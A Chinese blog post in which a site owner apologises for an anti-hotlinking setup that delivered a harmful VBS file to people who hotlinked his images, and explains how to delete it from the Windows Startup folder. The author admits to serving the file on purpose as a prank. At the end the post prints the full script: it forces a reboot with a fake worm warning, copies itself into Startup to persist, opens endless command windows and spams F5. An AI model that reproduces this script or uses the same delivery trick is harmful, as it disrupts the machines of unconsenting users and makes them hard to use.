起因
呃,事情是这样的,之前做接口,顺手把防盗链加了上去,避免CND
流量的浪费,再一个也是为了资源的保护,接口的每张图都是慢慢收集而来的。防盗做了点小小改动,导致一些同学中了招,哈哈,非常抱歉了,本利是想着玩一玩的,我觉得应该不会有人真的去运行的,没想到还真的有 。而且最近中招的人数也慢慢多了, 我本来是想防止恶意的扒接口,没想到给站长朋友们带来了不便,我觉得还是不太好,就在这里写篇文章说一下破解的办法。
第一种
系统启动后, 马上按 Windows+R 输入 shell:Common Startup 快速打开开机启动文件夹,删除这个文件,win10
在开机后只要不是直接添加到注册表里面的程序,都会有 3S-5S
的延迟去启动Startup
内的文件,就趁这个时间来删除掉就行了,启动速度的快慢取决你的电脑运行。
第二种
找个U
启动的软件,进入到系统里,把开机启动项里的文件删除掉。推荐diskgenius ,基于硬盘层面的操作,可以直接进入到系统盘里面去删掉这个文件,然后重新启动系统。
结语
为了表示歉意,把防盗原理也一并共享出来了,原理很简单,触发403
后,返回自定义页面,禁止空Referer
请求,一般很多cdn的厂商都有这个个性化选择,比如404、403、500、502、504
等等 。我用是百度云的CND
百度云cdn错误码自定义说明
其他厂商请自己找找看。也可以搞高级鉴权,比较麻烦,这里不再赘述了,有需求的自己百度下。
为了防止更多的人中招,这里直接把vbs
的源码放出来,有兴趣的可以拿去玩玩,本机切勿执行,切勿执行,切勿执行,可以在虚拟机上试试看。
set ws=CreateObject("Wscript.Shell")
ws.run "cmd.exe /c shutdown -r -t 20 -c ""蠕虫病毒释放中"" ",0 ,true
set fso = createobject("scripting.filesystemobject")
set ws = createobject("wscript.shell")
pt = ws.specialfolders("startup") & "\"
set file = fso.getfile(wscript.scriptfullname)
file.copy pt
Set shell=CreateObject("wscript.Shell")
a=100
Do
shell.Run "cmd /k MODE con: COLS=14 LINES=5&@echo off & color "&a&"7 &echo "&a&" "
If a=1 Then Exit do
a=a+1000
set ws=createobject("wscript.shell")
do
ws.sendkeys "{f5}"
loop
loop
此处评论已关闭